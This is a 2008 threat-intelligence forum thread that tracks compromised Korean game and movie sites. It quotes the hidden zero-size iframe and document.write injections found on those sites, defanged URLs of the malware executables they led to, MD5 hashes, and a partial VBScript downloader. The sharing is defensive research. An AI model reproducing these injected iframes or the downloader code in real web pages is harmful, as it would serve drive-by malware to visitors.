Malware Domain List

Malware Related => Malicious Domains => Topic started by: M.J.Kim on March 09, 2008, 02:13:04 pm

Title: OnlineGames..
Post by: M.J.Kim on March 09, 2008, 02:13:04 pm

OnlineGames...

Quote

hxxp://219.84.165.51/ads/ad.htm

Download Malware Files.

Title: Re: OnlineGames..
Post by: bobby on March 09, 2008, 02:37:56 pm

Quote

hxxp://219.84.165.51/ads/sub.exe

Title: Re: OnlineGames..
Post by: JohnC on March 09, 2008, 02:52:47 pm

Thank you both.

Title: Re: OnlineGames..
Post by: pcaccent on March 09, 2008, 03:19:40 pm

nice to meet you M.J.KIM  ;D ;D ;D ;D
You mean:
1)

Quote

hxxp://www.ontooniverse.com/

2) <iframe height=0 width=0 Src="

Quote

hxxp://219.84.165.51/ads/ad.htm

"></iframe>

Title: Re: OnlineGames..
Post by: pcaccent on March 15, 2008, 03:24:15 am

Quote

hxxp://www.ontooniverse.com/
     <iframe height=0 width=0 Src="hxxp://219.84.165.168/ads/ad.htm"></iframe>
              hxxp://219.84.165.168/ads/ad.exe
     <iframe src=hxxp://61.100.185.23/MB/M.htm width=0 height=0></iframe>
              hxxp://61.100.185.23/MB/M.exe

Title: Re: OnlineGames..
Post by: JohnC on March 15, 2008, 09:16:18 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on March 16, 2008, 08:49:19 am

another website.

Quote

hxxp://www.onmoviestyle.com/channel/action/action_index.asp

Quote

<iframe height=0 width=0 Src="hxxp://219.84.165.168/ads/ad.htm"></iframe>       

Title: Re: OnlineGames..
Post by: pcaccent on March 20, 2008, 11:35:42 pm

Quote

hxxp://www.ontooniverse.com/
        <iframe src=hxxp://61.100.185.23/MB/X.htm width=0 height=0></iframe>
                 hxxp://61.100.185.23/MB/A.exe

Title: Re: OnlineGames..
Post by: pcaccent on March 26, 2008, 09:54:55 am

changed url
(today(March 26, 2008, 06:59:01 PM) GMT+9)

Quote

hxxp://www.ontooniverse.com/
         <iframe width=0 height=0 src=hxxp://bbn112.com/M.htm></iframe>
                 hxxp://bbn112.com/A.exe

Quote

<html>
<script language="VBScript">
on error resume next
dl = "hxxp://bbn112.com/A.exe"
Set df = document.createElement("ob"&"ject")
df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36"
str="Microsoft"&".XMLHTTP"
...

but it don't work.







...
Sunset on ibiza _ likuida remix /* fantastic */

Title: Re: OnlineGames..
Post by: JohnC on March 27, 2008, 12:49:03 am

Thank you.

Title: Re: OnlineGames..
Post by: pcaccent on March 28, 2008, 10:10:38 am

changed url
March 28, 2008, 07:09:01 PM) GMT+9

Quote

hxxp://www.ontooniverse.com/
        <iframe width=0 height=0 src=hxxp://211.174.63.213/nw/L.htm></iframe>
                hxxp://211.174.63.213/nw/X.exe

Title: Re: OnlineGames..
Post by: pcaccent on March 29, 2008, 12:18:15 am

Quote

hxxp://www.songsari.com/
        hxxp://www.songsari.com/js/FcScript.js
                hxxp://www.songsari.com/js/http://219.84.165.139/ads/ad.htm
                       hxxp://219.84.165.139/ads/ad.exe

hxxp://www.onmoviestyle.com/index.asp
        <iframe height=0 width=0 Src="hxxp://219.84.165.139/ads/ad.htm"></iframe>
                hxxp://219.84.165.139/ads/ad.exe

hxxp://www.ontooniverse.com/
        <iframe height=0 width=0 Src="hxxp://219.84.165.139/ads/ad.htm"></iframe>
                hxxp://219.84.165.139/ads/ad.exe

Quote

hxxp://203.251.224.124/i/i/dmx.exe

Title: Re: OnlineGames..
Post by: pcaccent on April 06, 2008, 12:07:28 pm

Quote

hxxp://www.ontooniverse.com/
        <iframe width=0 height=0 src=hxxp://220.95.231.187/win/X.htm></iframe>
                hxxp://220.95.231.187/win/a.exe

Title: Re: OnlineGames..
Post by: JohnC on April 06, 2008, 03:21:26 pm

Thank you.

Title: Re: OnlineGames..
Post by: pcaccent on April 10, 2008, 12:53:44 pm

Quote

<iframe width=0 height=0 src=hxxp://ebabyart.co.kr/fla/M.htm></iframe>
        hxxp://ebabyart.co.kr/fla/A.exe

Quote

hxxp://ebabyart.co.kr/
        hxxp://ebabyart.co.kr/inc/common.js
                document.write('<iframe height=0 width=0 src="hxxp://ebabyart.co.kr/fla/M.htm"></iframe>');

Title: Re: OnlineGames..
Post by: pcaccent on April 17, 2008, 09:41:43 am

Quote

hxxp://www.ontooniverse.com/
        <iframe width=0 height=0 src=hxxp://phi.or.kr/memo/T.htm></iframe>
                hxxp://phi.or.kr/memo/A.exe

MS06-014 exploit

Title: Re: OnlineGames..
Post by: pcaccent on April 21, 2008, 11:38:25 pm

Quote

hxxp://www.ontooniverse.com/
        <iframe width=0 height=0 src=hxxp://inity.co.kr/web/X.htm></iframe>
                hxxp://inity.co.kr/web/a.exe

Title: Re: OnlineGames..
Post by: JohnC on April 22, 2008, 12:03:12 am

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on April 22, 2008, 01:45:01 pm

Quote

hxxp://www.ontooniverse.com/
        <iframe width=0 height=0 src=hxxp://the5.com/new/index.htm></iframe>
                hxxp://the5.com/new/A.exe

a. MS06-014 exploit
b. A.exe - MD5 : a2080bb106241e1e6aa3e97c8fe8eabc

Title: Re: OnlineGames..
Post by: pcaccent on May 07, 2008, 07:33:08 am

may 7, 2008, 04:33:24 PM GMT+9

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
        <iframe width=0 height=0 src=hxxp://www.boheomin.co.kr/sian/H.htm></iframe>
                hxxp://www.boheomin.co.kr/sian/a.exe

Quote

hxxp://www.boheomin.co.kr/
        <iframe width=0 height=0 src=hxxp://the5.com/new/index.htm></iframe>
                hxxp://the5.com/new/a.exe

Title: Re: OnlineGames..
Post by: JohnC on May 07, 2008, 06:40:36 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on May 11, 2008, 03:56:24 am

may 11, 2008, 12:55:24 PM GMT+9

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
   <iframe width=0 height=0 src=hxxp://onflashgame.kr/swf/M.htm></iframe>
       exe = "hxxp://onflashgame.kr/swf/A.exe"

Title: Re: OnlineGames..
Post by: JohnC on May 11, 2008, 09:44:08 pm

Thank you.

Title: Re: OnlineGames..
Post by: pcaccent on May 15, 2008, 07:25:10 am

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
      <iframe width=0 height=0 src=hxxp://yanbianitman.or.kr/Test/index.htm></iframe>
             <iframe width=0 height=0 src=hxxp://yanbianitman.or.kr/Test/H.htm></iframe>
                   hxxp://yanbianitman.or.kr/Test/A.exe
            <iframe width=0 height=0 src=hxxp://yanbianitman.or.kr/Test/H1.htm></iframe>
                   hxxp://yanbianitman.or.kr/Test/B.exe

Title: Re: OnlineGames..
Post by: pcaccent on May 18, 2008, 10:45:06 pm

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
      <script src=hxxp://211.58.241.36/mpv.js></script>
      <iframe width=0 height=0 src=hxxp://www.bitfas.com/pop/index.htm></iframe>
            <iframe width=0 height=0 src=http://www.bitfas.com/pop/T.htm></iframe>
                  hxxp://www.bitfas.com/pop/A.exe
            <iframe width=0 height=0 src=http://www.bitfas.com/pop/T1.htm></iframe>
                  hxxp://www.bitfas.com/pop/B.exe

            .
            .

Title: Re: OnlineGames..
Post by: JohnC on May 18, 2008, 11:19:23 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on May 27, 2008, 09:15:24 am

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
   <iframe width=0 height=0 src=hxxp://www.wppa.co.kr/DB/index.htm></iframe><html>
      <iframe width=0 height=0 src=hxxp://www.wppa.co.kr/DB/M.htm></iframe>
          hxxp://www.wppa.co.kr/DB/D.exe
      <iframe width=0 height=0 src=http://www.wppa.co.kr/DB/M1.htm></iframe>
          hxxp://www.wppa.co.kr/DB/W.exe

Title: Re: OnlineGames..
Post by: JohnC on May 27, 2008, 05:41:20 pm

Thank you.

Title: Re: OnlineGames..
Post by: pcaccent on May 29, 2008, 02:38:02 pm

Quote

hxxp://ontooniverse.com/y_main_4.asp
      hxxp://tossm.com/link/index.htm
            hxxp://tossm.com/link/H.htm
                  hxxp://tossm.com/link/W.exe
            hxxp://tossm.com/link/H1.htm
                  hxxp://tossm.com/link/D.exe

Title: Re: OnlineGames..
Post by: JohnC on May 29, 2008, 10:30:32 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on May 30, 2008, 02:45:35 pm

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
      <iframe width=0 height=0 src=hxxp://tossm.com/link/index.htm></iframe>
            <iframe width=0 height=0 src=hxxp://tossm.com/link/H.htm></iframe>
                  hxxp://tossm.com/link/W.exe
            <iframe width=0 height=0 src=hxxp://tossm.com/link/H1.htm></iframe>
                  hxxp://tossm.com/link/D.exe

May 30, 2008, 11:46 PM
from Seoul, Korea, Good-night ;D ;D ;D

Title: Re: OnlineGames..
Post by: pcaccent on May 31, 2008, 01:00:32 pm

Quote

hxxp://211.58.241.36/top.htm
      hxxp://218.234.18.143:8080/client/File/dll.exe

Title: Re: OnlineGames..
Post by: pcaccent on June 22, 2008, 04:40:06 am

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
   <script language=javascript src=hxxp://211.42.194.7/test/1.js></script><html>
       document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/X.htm"></iframe>');
          hxxp://211.42.194.7/test/X.exe
       document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/XX.htm"></iframe>');
          hxxp://211.42.194.7/test/XX.exe

Title: Re: OnlineGames..
Post by: JohnC on June 22, 2008, 09:37:12 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on June 30, 2008, 01:44:17 pm

Quote

1. 2008/6/22
hxxp://www.ontooniverse.com/y_main_4.asp
   <script language=javascript src=hxxp://211.42.194.7/test/1.js></script><html>
       document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/X.htm"></iframe>');
          hxxp://211.42.194.7/test/X.exe
       document.write('<iframe height=0 width=0 src="hxxp://211.42.194.7/test/XX.htm"></iframe>');
          hxxp://211.42.194.7/test/XX.exe

2. 2008/6/25
hxxp://ontooniverse.com/y_main_4.asp
   <iframe width=0 height=0 src=hxxp://61.107.210.11/my/HH.htm></iframe><html>

hxxp://www.ontooniverse.com/Lib/jscript/common.js
   document.write('<iframe height=0 width=0 src="hxxp://121.0.119.203/index.html"></iframe>');

hxxp://ontooniverse.com/y_main_4.asp
   <script language=javascript src=hxxp://61.107.210.11/my/1.js></script>
      hxxp://61.107.210.11/my/T.htm
         hxxp://61.107.210.11/my/T.exe
      hxxp://61.107.210.11/my/TT.htm
         hxxp://61.107.210.11/my/TT.exe

hxxp://www.ontooniverse.com/Lib/jscript/common.js
   document.write('<iframe height=0 width=0 src="hxxp://222.122.138.111/temp/006/index.html"></iframe>');
      hxxp://222.122.138.111/temp/006/h.exe

3. 2008/6/28
hxxp://www.ontooniverse.com/y_main_4.asp
   <iframe height=0 width=0 src="hxxp://61.82.71.36/index.htm"></iframe>
      hxxp://61.82.71.36/h.exe
         V3 : Win-Trojan/LineageHack.91857

Title: Re: OnlineGames..
Post by: JohnC on June 30, 2008, 11:17:03 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on July 01, 2008, 11:29:00 pm

Quote

hxxp://www.ontooniverse.com/y_main_4.asp
   hxxp://203.245.160.14/O/H.htm
      hxxp://203.245.160.14/O/H.exe

Quote

hxxp://www.ontooniverse.com/y_main_5.asp
   hxxp://211.239.157.205/swf/X.htm
      hxxp://211.239.157.205/swf/X.exe

Title: Re: OnlineGames..
Post by: JohnC on July 02, 2008, 08:00:43 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on July 04, 2008, 02:44:37 pm

Quote

hxxp://www.ontooniverse.com/y_main_5.asp
   hxxp://211.239.157.205/swf/II.htm
      hxxp://juli.vaivai.net/BT/111/br.exe
         - NOD32, V3, VirusChaser(Dr.Web) : .
         - MD5 : 43452a6aeee88124ad04a1f547f06d59
         - suspicious file.

Title: Re: OnlineGames..
Post by: pcaccent on July 09, 2008, 12:12:47 pm

Quote

hxxp://www.sovo.co.kr/poll/T.htm
   <iframe width=0 height=0 src=hxxp://www.sovo.co.kr/poll/A.htm></iframe>
      hxxp://www.sovo.co.kr/poll/A.exe
hxxp://www.sovo.co.kr/poll/TT.htm
   <iframe width=0 height=0 src=hxxp://www.sovo.co.kr/poll/AA.htm></iframe>
      hxxp://www.sovo.co.kr/poll/AA.exe

hxxp://www.ontooniverse.com/Lib/jscript/common_new.js
   document.write('<iframe height=0 width=0 src="hxxp://116.193.89.27/index.htm"></iframe>');
      hxxp://211.174.62.82/h.exe

Title: Re: OnlineGames..
Post by: JohnC on July 11, 2008, 03:13:02 pm

Thanks.

Title: Re: OnlineGames..
Post by: pcaccent on July 12, 2008, 11:56:23 pm

Quote

hxxp://www.ontooniverse.com/Lib/jscript/common_new.js
   document.write('<iframe height=0 width=0 src="hxxp://61.74.73.136/index.htm"></iframe>');
      hxxp://61.74.73.136/T.exe

Quote

hxxp://www.onmoviestyle.com/acecounter/acecounter_mainscript.js
   doucment.write('<ifarme height=0 width=0 src="hxxp://61.74.73.136/index.htm"></ifarme>');
      hxxp://61.74.73.136/T.exe

Quote

hxxp://www.mbcgame.co.kr/
   hxxp://www.mbcgame.co.kr/js/flash.js
      document.write('<iframe height=0 width=0 src="hxxp://61.74.73.136/index.htm"></iframe>');
         hxxp://61.74.73.136/T.exe

Title: Re: OnlineGames..
Post by: Kayrac on July 13, 2008, 12:01:32 am

http://www.virustotal.com/analisis/45f3a4df7287e7c5c2ad5acbe6db68fc

most already detect it :)

the t.exe that is :)


threatexpert of it
http://www.threatexpert.com/report.aspx?md5=2aa090edee6ce80718b0be14da85bcc2
md5:0x2AA090EDEE6CE80718B0BE14DA85BCC2

Title: Re: OnlineGames..
Post by: pcaccent on July 13, 2008, 10:55:30 am

Thnak you for reply Kayrac. ;D ;D ;D

Quote

hxxp://movie.fileguri.com/common/js/ajax2.js
   document.write('<iframe height=0 width=0 src="hxxp://pay.topservice.co.kr/index.htm"></iframe>');
      hxxp://pay.topservice.co.kr/T.exe

Title: Re: OnlineGames..
Post by: pcaccent on July 28, 2008, 02:26:53 pm

Quote

hxxp://www.ontooniverse.com/
   hxxp://www.ontooniverse.com/tooniland_notice.asp
      hxxp://218.55.99.144/index.htm
         hxxp://218.55.99.144/WV.exe

Title: Re: OnlineGames..
Post by: Kayrac on July 28, 2008, 03:34:19 pm

http://www.virustotal.com/analisis/66fe0d2e554d14dc0e0f137bdd4749b5

for wv :)

poorly detected, i sent it around :)

Title: Re: OnlineGames..
Post by: JohnC on July 30, 2008, 07:40:58 pm

Thank you :)